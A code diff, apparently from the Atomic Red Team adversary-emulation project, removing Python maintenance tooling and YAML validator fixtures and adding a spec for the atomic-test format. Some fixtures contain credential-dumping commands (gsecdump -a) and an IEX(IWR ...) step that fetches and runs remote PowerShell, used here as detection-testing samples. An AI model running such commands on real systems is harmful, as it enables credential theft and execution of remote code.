        lambda m: f"{m.group(1)}\n{m.group(2).replace('-', ' ')}auto_generated_guid:",
        og_text,
        flags=re.MULTILINE,
    )
    # Fill the "auto_generated_guid:" element in if it doesn't contain a guid
    # (the lookahead matches a well-formed v4 UUID and skips those lines).
    text = re.sub(
        r"(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$",
        lambda m: f"{m.group(1)} {get_guid()}",
        text,
        flags=re.MULTILINE,
    )
    # Only rewrite the file when something actually changed.
    if text != og_text:
        with open(path, "wb") as file:
            # using wb mode instead of w. If not, the end of line characters are auto-converted to OS specific ones.
            file.write(text.encode())
-165
View File
@@ -1,165 +0,0 @@
import fnmatch
import json
import os
import re
from dataclasses import dataclass
import requests
import yaml
from yaml.loader import SafeLoader
def get_technique_from_filename(filename):
    """Extract the first technique identifier (e.g. "T1003.001") from a path."""
    candidates = re.findall(r"T[.\d]{4,8}", filename)
    return candidates[0]
@dataclass
class ChangedAtomic:
    """One changed atomic test: technique plus 1-based test number, used to run atomics in CI/CD pipelines."""

    # ATT&CK technique identifier, e.g. "T1003.001".
    technique: str
    # 1-based position of the test within the technique's atomic_tests list.
    test_number: int
    # Parsed YAML dict of the single atomic test.
    data: dict
class SafeLineLoader(SafeLoader):
    """SafeLoader variant that records each mapping's starting line under "__line__"."""

    def construct_mapping(self, node, deep=False):
        """Add line number to each block of the atomic test."""
        mapping = super(SafeLineLoader, self).construct_mapping(node, deep=deep)
        # Add 1 so line numbering starts at 1
        mapping["__line__"] = node.start_mark.line + 1
        return mapping
class GithubAPI:
    """Minimal GitHub REST client used by CI to label PRs and pick maintainers."""

    # Platform identifier -> GitHub label applied to the pull request.
    labels = {
        "windows": "windows",
        "macos": "macOS",
        "linux": "linux",
        "azure-ad": "ADFS",
        "containers": "containers",
        "iaas:gcp": "cloud",
        "iaas:aws": "cloud",
        "iaas:azure": "cloud",
        "office-365": "cloud",
        "google-workspace": "cloud",
    }
    # Platform identifier -> GitHub handles of reviewers for that platform.
    maintainers = {
        "windows": ["clr2of8", "MHaggis", "cyberbuff"],
        "linux": ["josehelps", "cyberbuff"],
        "macos": ["josehelps", "cyberbuff"],
        "containers": ["patel-bhavin"],
        "iaas:gcp": ["patel-bhavin"],
        "iaas:aws": ["patel-bhavin"],
        "iaas:azure": ["patel-bhavin"],
        "azure-ad": ["patel-bhavin"],
        "google-workspace": ["patel-bhavin"],
        "office-365": ["patel-bhavin"],
    }

    def __init__(self, token):
        # token: GitHub API bearer token (needs read access to the repo's PRs).
        self.token = token

    @property
    def headers(self):
        """REST headers: bearer auth plus the pinned GitHub API version."""
        return {
            "Authorization": f"Bearer {self.token}",
            "X-GitHub-Api-Version": "2022-11-28",
            "Accept": "application/vnd.github+json",
        }

    def get_atomic_with_lines(self, file_url: str):
        """Get Atomic Technique along with line number for each of the atomics."""
        r = requests.get(file_url, headers=self.headers)
        assert r.status_code == 200
        # SafeLineLoader annotates every mapping with its "__line__" number.
        return yaml.load(r.text, Loader=SafeLineLoader)

    def get_files_for_pr(self, pr):
        """Get new and modified files in the `atomics` directory changed in a PR."""
        response = requests.get(
            f"https://api.github.com/repos/{os.getenv('GITHUB_REPOSITORY')}/pulls/{pr}/files",
            headers=self.headers,
            timeout=15,
        )
        assert response.status_code == 200
        files = response.json()
        # Only technique YAML files that were added or modified (not removed/renamed).
        return filter(
            lambda x: (
                x["status"] in ["added", "modified"]
                and fnmatch.fnmatch(x["filename"], "atomics/T*/T*.yaml")
            ),
            files,
        )

    def get_tests_changed(self, pr: str):
        """Get all the tests changed in a PR"""
        tests = []
        start = 0
        files = self.get_files_for_pr(pr)
        for file in files:
            data = self.get_atomic_with_lines(file["raw_url"])
            technique = get_technique_from_filename(file["filename"])
            if file["status"] == "added":
                # New file; run the entire technique; Invoke-AtomicTest Txxxx
                tests += [
                    ChangedAtomic(technique=technique, test_number=index + 1, data=t)
                    for index, t in enumerate(data["atomic_tests"])
                ]
            else:
                # Modified file: parse the unified diff to find which line
                # numbers were added, then map those onto individual tests.
                changed_lines = []
                count = 0
                for line in file["patch"].split("\n"):
                    if line.startswith("@@"):
                        # Hunk header, e.g. "@@ -10,7 +10,8 @@".
                        # NOTE(review): \d{1,3} caps line numbers at 999 and the
                        # unpack assumes exactly two "a,b" pairs — confirm this
                        # holds for large files / single-line hunks.
                        x, y = re.findall(r"\d{1,3},\d{1,3}", line)
                        start = int(x.split(",")[0])
                        count = -1
                    elif line.startswith("+"):  # only take count of added lines
                        changed_lines.append(start + count)
                    elif line.startswith("-"):
                        # Removed lines don't advance the new-file line counter.
                        count -= 1
                    count += 1
                atomics = data["atomic_tests"]
                for index, t in enumerate(atomics):
                    curr_atomic_start = atomics[index]["__line__"]
                    if index + 1 < len(atomics):
                        curr_atomic_end = atomics[index + 1]["__line__"]
                    else:
                        # Last test: heuristic end bound past the final hunk.
                        curr_atomic_end = start + 60
                    changes_in_current_atomic = [
                        i
                        for i in changed_lines
                        if i > curr_atomic_start and i < curr_atomic_end
                    ]
                    if len(changes_in_current_atomic) > 0:
                        tests.append(
                            ChangedAtomic(
                                technique=technique, test_number=index + 1, data=t
                            )
                        )
        return tests

    def save_labels_and_maintainers(self, pr):
        """Saves labels and maintainers into `pr/labels.json` which would be later used by a workflow run."""
        tests = self.get_tests_changed(pr)
        platforms = set()
        for t in tests:
            platforms.update(t.data["supported_platforms"])
        labels = []
        maintainers = []
        for p in platforms:
            if p in self.labels:
                labels.append(self.labels[p])
            if p in self.maintainers:
                maintainers += self.maintainers[p]
        # NOTE(review): os.mkdir raises if "pr" already exists — confirm the
        # workflow always starts from a clean workspace.
        os.mkdir("pr")
        with open("pr/changedfiles.json", "w") as f:
            x = [{"name": t.technique, "test_number": t.test_number} for t in tests]
            f.write(json.dumps(x))
        with open("pr/labels.json", "w") as f:
            j = {"pr": pr, "labels": labels, "maintainers": maintainers}
            f.write(json.dumps(j))
-270
View File
@@ -1,270 +0,0 @@
import re
from functools import reduce
from typing import Dict, List, Literal, Optional, Union
from uuid import UUID
from pydantic import (
AnyUrl,
BaseModel,
ConfigDict,
Field,
IPvAnyAddress,
StrictFloat,
StringConstraints,
conlist,
constr,
field_serializer,
field_validator,
model_validator,
)
from pydantic_core import PydanticCustomError
from pydantic_core.core_schema import ValidationInfo
from typing_extensions import Annotated, TypedDict
InputArgType = Literal["url", "string", "float", "integer", "path"]
Platform = Literal[
"windows",
"macos",
"linux",
"office-365",
"azure-ad",
"google-workspace",
"saas",
"iaas",
"containers",
"iaas:gcp",
"iaas:azure",
"iaas:aws",
"esxi",
]
ExecutorType = Literal["manual", "powershell", "sh", "bash", "command_prompt"]
DomainName = Annotated[
str,
StringConstraints(
pattern=r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"
),
]
AttackTechniqueID = Annotated[
str, StringConstraints(pattern=r"T\d{4}(?:\.\d{3})?", min_length=5)
]
def extract_mustached_keys(commands: List[Optional[str]]) -> List[str]:
    """Collect the distinct `#{key}` placeholder names used in the commands.

    Args:
        commands: command strings to scan; None entries are skipped.

    Returns:
        Deduplicated key names in first-occurrence order. (The previous
        `list(set(...))` produced hash-dependent order, which varies between
        interpreter runs; callers only test membership, so a deterministic
        order is safe and makes output reproducible.)
    """
    keys: List[str] = []
    for command in commands:
        if command:
            for match in re.finditer(r"#{(.*?)}", command, re.MULTILINE):
                keys.append(match.group(1))
    # dict.fromkeys deduplicates while preserving first-seen order.
    return list(dict.fromkeys(keys))
def get_supported_platform(platform: Platform):
    """Map a platform identifier to its display name (e.g. "iaas:aws" -> "AWS").

    Raises KeyError for identifiers outside the Platform literal set.
    """
    display_names = {
        "windows": "Windows",
        "macos": "macOS",
        "linux": "Linux",
        "office-365": "Office 365",
        "azure-ad": "Azure AD",
        "google-workspace": "Google Workspace",
        "saas": "SaaS",
        "iaas": "IaaS",
        "iaas:aws": "AWS",
        "iaas:azure": "Azure",
        "iaas:gcp": "GCP",
        "containers": "Containers",
        "esxi": "ESXi",
    }
    return display_names[platform]
def get_language(executor: ExecutorType):
    """Markdown code-fence language for an executor name.

    "command_prompt" renders as "cmd"; "manual" has no code language;
    every other executor name is used verbatim.
    """
    overrides = {"command_prompt": "cmd", "manual": ""}
    return overrides.get(executor, executor)
class BaseArgument(TypedDict):
    # Every input-argument definition carries a free-text description.
    description: str

class UrlArg(BaseArgument):
    # Accepts a bare domain, a full URL, or an IP address.
    default: Optional[DomainName | AnyUrl | IPvAnyAddress]
    type: Literal["url", "Url"]

    # NOTE(review): field_serializer is a pydantic decorator applied inside a
    # TypedDict — confirm pydantic honors it when serializing these dicts.
    @field_serializer("default")
    def serialize_url(self, value):
        return str(value)

class StringArg(BaseArgument):
    default: Optional[str]
    # "path" values are validated as plain strings, not filesystem paths.
    type: Literal["string", "path", "String", "Path"]

class IntArg(BaseArgument):
    default: Optional[int]
    type: Literal["integer", "Integer"]

class FloatArg(BaseArgument):
    # StrictFloat rejects ints, so "1" is not a valid float default.
    default: Optional[StrictFloat]
    type: Literal["float", "Float"]

# Discriminated union: the "type" field selects which arg schema applies.
Argument = Annotated[
    Union[FloatArg, IntArg, UrlArg, StringArg], Field(discriminator="type")
]
class StrictModel(BaseModel):
    # Shared base: reject unknown keys ("forbid") and validate both defaults
    # and later attribute assignments, so YAML typos fail loudly.
    model_config = ConfigDict(
        validate_default=True, extra="forbid", validate_assignment=True
    )
class Executor(StrictModel):
    # Base executor: which framework runs the test, and whether it needs
    # admin/root privileges (defaults to False).
    name: ExecutorType
    elevation_required: bool = False

class ManualExecutor(Executor):
    # Manual tests describe human steps instead of a runnable command.
    name: Literal["manual"]
    steps: str = Field(..., min_length=10)

class CommandExecutor(Executor):
    # Scripted tests: a required command plus an optional cleanup command.
    name: Literal["powershell", "sh", "bash", "command_prompt"]
    command: constr(min_length=1)
    cleanup_command: Optional[str] = None
class Dependency(StrictModel):
    # A test prerequisite: prereq_command checks whether it is satisfied,
    # get_prereq_command (optional) installs/fetches it.
    description: constr(min_length=1)
    prereq_command: constr(min_length=1)
    get_prereq_command: Optional[str]
class Atomic(StrictModel):
    """Schema for a single atomic test inside a technique YAML file."""

    # Filled in post-init by Technique (e.g. "T1003-1"); not present in YAML.
    test_number: Optional[str] = None
    name: constr(min_length=1)
    description: constr(min_length=1)
    supported_platforms: conlist(Platform, min_length=1)
    # The "name" field discriminates manual vs. command executors.
    executor: Union[ManualExecutor, CommandExecutor] = Field(..., discriminator="name")
    dependencies: Optional[List[Dependency]] = []
    input_arguments: Dict[constr(min_length=2, pattern=r"^[\w_-]+$"), Argument] = {}
    dependency_executor_name: Optional[ExecutorType] = None
    auto_generated_guid: Optional[UUID] = None

    @classmethod
    def extract_mustached_keys(cls, value: dict) -> List[str]:
        """Collect every `#{key}` placeholder used by the test's commands/steps."""
        commands = []
        executor = value.get("executor")
        if isinstance(executor, CommandExecutor):
            commands = [executor.command, executor.cleanup_command]
        if isinstance(executor, ManualExecutor):
            commands = [executor.steps]
        for d in value.get("dependencies") or []:
            commands.extend([d.get_prereq_command, d.prereq_command])
        return extract_mustached_keys(commands)

    @field_validator("dependency_executor_name", mode="before")  # noqa
    @classmethod
    def validate_dep_executor(cls, v, info: ValidationInfo):
        # A dependency executor is meaningless without dependencies.
        if v is not None and info.data.get("dependencies") == []:
            raise PydanticCustomError(
                "invalid_dependency_executor_name",
                "'dependency_executor_name' is not needed if there are no dependencies. Remove the key from YAML",
                {"loc": ["dependency_executor_name"], "input": None},
            )
        return v

    @model_validator(mode="after")
    def validate_elevation_required(self):
        # On linux/macos, a command using sudo must declare elevation_required.
        if (
            ("linux" in self.supported_platforms or "macos" in self.supported_platforms)
            and not self.executor.elevation_required
            and isinstance(self.executor, CommandExecutor)
        ):
            commands = [self.executor.command]
            if self.executor.cleanup_command:
                commands.append(self.executor.cleanup_command)
            if any(["sudo" in cmd for cmd in commands]):
                raise PydanticCustomError(
                    "elevation_required_but_not_provided",
                    "'elevation_required' shouldn't be empty/false. Since `sudo` is used, set `elevation_required` to true`",
                    {
                        "loc": ["executor", "elevation_required"],
                        "input": self.executor.elevation_required,
                    },
                )
        return self

    @field_validator("input_arguments", mode="before")  # noqa
    @classmethod
    def validate(cls, v, info: ValidationInfo):
        # Cross-check declared input_arguments against the `#{...}` placeholders
        # actually used: every declared arg must be used, every used key declared.
        if v is None:
            raise PydanticCustomError(
                "empty_input_arguments",
                "'input_arguments' shouldn't be empty. Provide a valid value or remove the key from YAML",
                {"loc": ["input_arguments"], "input": None},
            )
        atomic = info.data
        keys = cls.extract_mustached_keys(atomic)
        for key, _value in v.items():
            if key not in keys:
                raise PydanticCustomError(
                    "unused_input_argument",
                    f"'{key}' is not used in any of the commands",
                    {"loc": ["input_arguments", key], "input": key},
                )
            else:
                keys.remove(key)
        # Any placeholder left over has no matching declaration.
        if len(keys) > 0:
            for x in keys:
                raise PydanticCustomError(
                    "missing_input_argument",
                    f"{x} is not defined in input_arguments",
                    {"loc": ["input_arguments"]},
                )
        return v
class Technique(StrictModel):
    """Schema for a whole technique YAML file (one file per ATT&CK technique)."""

    attack_technique: AttackTechniqueID
    display_name: str = Field(..., min_length=5)
    atomic_tests: List[Atomic] = Field(min_length=1)

    @model_validator(mode="before")
    @classmethod
    def validate_dependency_executor_names(cls, data):
        """Check if dependency_executor_name keys are present with empty/None values in atomic tests"""
        # Runs before field parsing so an empty value is caught with a clear
        # message instead of a generic enum/type error.
        if isinstance(data, dict) and "atomic_tests" in data:
            atomic_tests = data.get("atomic_tests", [])
            for i, test in enumerate(atomic_tests):
                if isinstance(test, dict) and "dependency_executor_name" in test:
                    value = test.get("dependency_executor_name")
                    # If the key exists but value is None or empty string, that's an error
                    if value is None or value == "":
                        raise PydanticCustomError(
                            "empty_dependency_executor_name",
                            "'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
                            "'bash', 'command_prompt'] or remove the key from YAML",
                            {
                                "loc": ["atomic_tests", i, "dependency_executor_name"],
                                "input": value,
                            },
                        )
        return data

    def model_post_init(self, __context) -> None:
        # Assign stable 1-based test numbers, e.g. "T1003-1", "T1003-2", ...
        for index in range(len(self.atomic_tests)):
            test_number = f"{self.attack_technique}-{index + 1}"
            self.atomic_tests[index].test_number = test_number
-70
View File
@@ -1,70 +0,0 @@
import re
import shlex
import subprocess
from pathlib import Path
from atomic_red_team.common import atomics_path
DEFAULT_ATOMIC_TEMPLATE = """attack_technique: TODO
display_name: TODO
atomic_tests:
- name: TODO
auto_generated_guid: TODO
description: |
TODO
supported_platforms:
- windows
input_arguments:
TODO:
description: TODO
type: string
default: TODO
executor:
command: |
TODO
name: command_prompt
"""
def create_or_append_atomic(
    technique_id: str,
    atomics_dir: str | Path = atomics_path,
) -> Path:
    """Creates a new technique YAML file or appends a blank atomic test.

    Args:
        technique_id: technique identifier, case-insensitive (normalized to upper).
        atomics_dir: root atomics directory; defaults to the repo's atomics path.

    Returns:
        Path to the (created or updated) technique YAML file.
    """
    technique_id = technique_id.upper()
    technique_path = Path(atomics_dir) / technique_id / f"{technique_id}.yaml"
    technique_path.parent.mkdir(parents=True, exist_ok=True)
    if technique_path.exists():
        # Existing file: append just the atomic_tests entry template.
        with technique_path.open("a") as file:
            file.write(f"\n{template_technique_atomic_test()}")
    else:
        # New file: write the full technique template (header + one test).
        technique_path.write_text(template_technique_tests(technique_id))
    return technique_path
def open_in_editor(path: Path, editor: str) -> int:
    """Open `path` with the given editor command; return the editor's exit status."""
    # The editor string may contain arguments (e.g. "code -w"); split it
    # shell-style and append the target path as the final argument.
    command = shlex.split(editor)
    command.append(str(path))
    return subprocess.call(command)
def template_technique_tests(technique_id: str | None = None) -> str:
    """Return the full technique YAML template, optionally with the ID filled in."""
    if not technique_id:
        return DEFAULT_ATOMIC_TEMPLATE
    # Substitute the placeholder technique line with the real (uppercased) ID.
    return DEFAULT_ATOMIC_TEMPLATE.replace(
        "attack_technique: TODO", f"attack_technique: {technique_id.upper()}"
    )
def template_technique_atomic_test() -> str:
    """Return just the single-test portion of the technique template.

    Raises:
        ValueError: if the template has no atomic_tests section.
    """
    match = re.search(r"atomic_tests:\n(.*)", template_technique_tests(), re.DOTALL)
    if match is None:
        raise ValueError(
            "atomic test template does not contain an atomic_tests section"
        )
    return match.group(1)
-138
View File
@@ -1,138 +0,0 @@
import glob
import json
import os
import shlex
import sys
import urllib.parse
from collections import defaultdict
from functools import partial
from typing import Annotated
import typer
from pydantic import ValidationError
from atomic_red_team.common import used_guids_file, atomics_path
from atomic_red_team.docs import AtomicRedTeamDocs
from atomic_red_team.guid import (
generate_guids_for_yaml,
get_unique_guid,
)
from atomic_red_team.labels import GithubAPI
from atomic_red_team.models import Technique
from atomic_red_team.new_atomic import create_or_append_atomic, open_in_editor
from atomic_red_team.validator import Validator, format_validation_error, yaml
app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
@app.command()
def generate_docs():
    """Generates markdown docs, indexes, and ATT&CK Navigator layers."""
    _oks, fails = AtomicRedTeamDocs().generate_all_the_docs()
    # Non-zero exit (= number of failures) fails the CI job.
    if fails:
        sys.exit(len(fails))
@app.command()
def new_atomic(
    technique_identifier: Annotated[
        str, typer.Argument(help="Technique identifier, such as T1234")
    ],
    edit: Annotated[bool, typer.Option("--edit/--no-edit")] = True,
):
    """Creates a new atomic YAML file or appends a blank test to an existing file."""
    output_path = create_or_append_atomic(technique_identifier)
    if edit:
        # Honor $EDITOR (which may include arguments); fall back to vi.
        editor = os.environ.get("EDITOR", "vi")
        if len(shlex.split(editor)) == 0:
            raise typer.BadParameter("EDITOR must not be empty")
        # Propagate the editor's exit status as our own.
        sys.exit(open_in_editor(output_path, editor))
@app.command()
def generate_guids():
    """Generates missing GUIDs for the atomic files"""
    # splitlines() (not readlines()) so entries carry no trailing "\n";
    # otherwise get_unique_guid's `guid not in guids` membership check could
    # never match and the duplicate-GUID guard was a no-op.
    with open(used_guids_file, "r") as file:
        used_guids = file.read().splitlines()
    for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
        generate_guids_for_yaml(file, partial(get_unique_guid, guids=used_guids))
@app.command()
def generate_schemas():
    """Generates JSON and YAML schemas for techniques"""
    schema = Technique.model_json_schema()  # (1)!
    with open("schema.yaml", "w") as f:
        # Block style (not inline flow) for a readable committed schema.
        yaml.default_flow_style = False
        yaml.dump(schema, f)
    with open("schema.json", "w") as f:
        f.write(json.dumps(schema, indent=2))
@app.command()
def generate_counter():
    """Generate atomic tests count svg"""
    # Total number of atomic tests across every technique YAML file.
    test_count = 0
    for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
        with open(file, "r") as f:
            yaml_data = yaml.load(f)
            if yaml_data is not None and "atomic_tests" in yaml_data:
                test_count += len(yaml_data["atomic_tests"])
    # Generate the shields.io badge URL
    params = {"label": "Atomics", "message": str(test_count), "style": "flat"}
    url = "https://img.shields.io/badge/{}-{}-{}.svg".format(
        urllib.parse.quote_plus(params["label"]),
        urllib.parse.quote_plus(params["message"]),
        urllib.parse.quote_plus(params["style"]),
    )
    # Save shields URL in GitHub Output to be used in the next step.
    with open(os.environ["GITHUB_OUTPUT"], "a") as fh:
        print(f"result={url}", file=fh)
@app.command()
def generate_labels(
    pull_request: Annotated[str, typer.Option("--pr")],
    token: Annotated[str, typer.Option("--token")],
):
    """Generate labels for a pull request."""
    # Writes pr/labels.json and pr/changedfiles.json for later workflow steps.
    api = GithubAPI(token)
    api.save_labels_and_maintainers(pull_request)
@app.command()
def validate():
    """
    Validate all the atomic techniques in a directory.

    Exits 0 and prints a success message when every file validates;
    otherwise prints every failure and exits 1.
    """
    validator = Validator()
    # path -> list of validation errors collected for that file.
    errors = defaultdict(list)
    for folder in glob.glob(f"{atomics_path}/T*"):
        for item in os.scandir(folder):
            try:
                validator.validate(item)
            except ValidationError as error:
                errors[item.path].append(error)
    if len(errors) == 0:
        print("Validation successful")
    else:
        print("Validation failed")
        # Renamed loop variables: the original `for i, errors in errors.items()`
        # shadowed (and rebound) the dict being iterated.
        for path, path_errors in errors.items():
            print(f"Error occurred with {path.replace(f'{atomics_path}/', '')}.")
            print("Each of the following are why it failed:")
            for error in path_errors:
                if isinstance(error, ValidationError):
                    for k, v in format_validation_error(error).items():
                        print(f"\n\tInvalid {'.'.join(map(str, v))}: {k}\n")
                else:
                    print(f"\n\t{error}\n")
        sys.exit(1)
if __name__ == "__main__":
app()
+164
View File
@@ -0,0 +1,164 @@
#
# This spec describes the format of Atomic Red Team atomic tests that are defined in YAML format.
#
# The directory structure is:
# - These tests reside in the `atomics` directory
# - One directory per ATT&CK technique, named "T1234"
# - All the atomic tests for a technique in a file called "T1234.yaml" inside that directory
# - Any payloads, supporting materials, etc for the atomic tests also live in that directory
#
# For example:
#
# atomic_red_team/
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# To validate your atomics, run `bin/validate-atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
display_name: Name of the technique as defined by ATT&CK. # Example: 'Audio Capture'
# `atomic_tests` is an array of distinct test cases inside this technique. A test case should
# include ALL of the information needed to run that test (ie, this is the "atomic" - you don't
# distribute steps across different atomics)
# Each of these tests is a YAML array element (starts with a `-`).
atomic_tests:
#
# This is the first atomic test
#
- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
- one list
- two list
- red list
- [blue list](https://google.com)
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - centos
# - ubuntu
# - linux
supported_platforms:
- windows
# inputs to the atomic test that are required to run the test (think of these like function arguments).
# This is a hash where the key is the input name, value is a hash defining the input argument.
input_arguments:
# this is the first input argument, called "output_file"
output_file:
# Short description of the input argument
description: xxxxx
# data type of the input. Possible values could include:
# - Path (a file path)
# - Url (a URL)
# - String
# - Integer
# - Float
# - really anything else you'd like, but add it to this list
type: Path
# default value for this argument that will be used if one is not specified
default: test.wma
# this is a example of a second argument
malware_payload_url:
description: xxxxx
type: Url
default: 0000:00:30
# a list of executors that can execute this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This is most often used when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
# multi-line list of instructions (also preprocessed)
#
# Example:
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
#
# 2. Click 'Load unpacked extension...' and navigate to
# [Browser_Extension](../T1176/)
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
- name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- centos
- ubuntu
# in this example we have no input arguments
input_arguments:
executors:
- name: bash
command: echo "Hello world!"
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Root login
auto_generated_guid:
description: |
Login as root.
supported_platforms:
- linux
executor:
command: |
sudo -i
name: bash
@@ -1,20 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
dependency_executor_name:
@@ -1,15 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
@@ -1,14 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
random_field: abc123
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: float
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: integer
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,20 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
dependency_executor_name: "bash"
@@ -1,39 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
- description: |
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,34 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
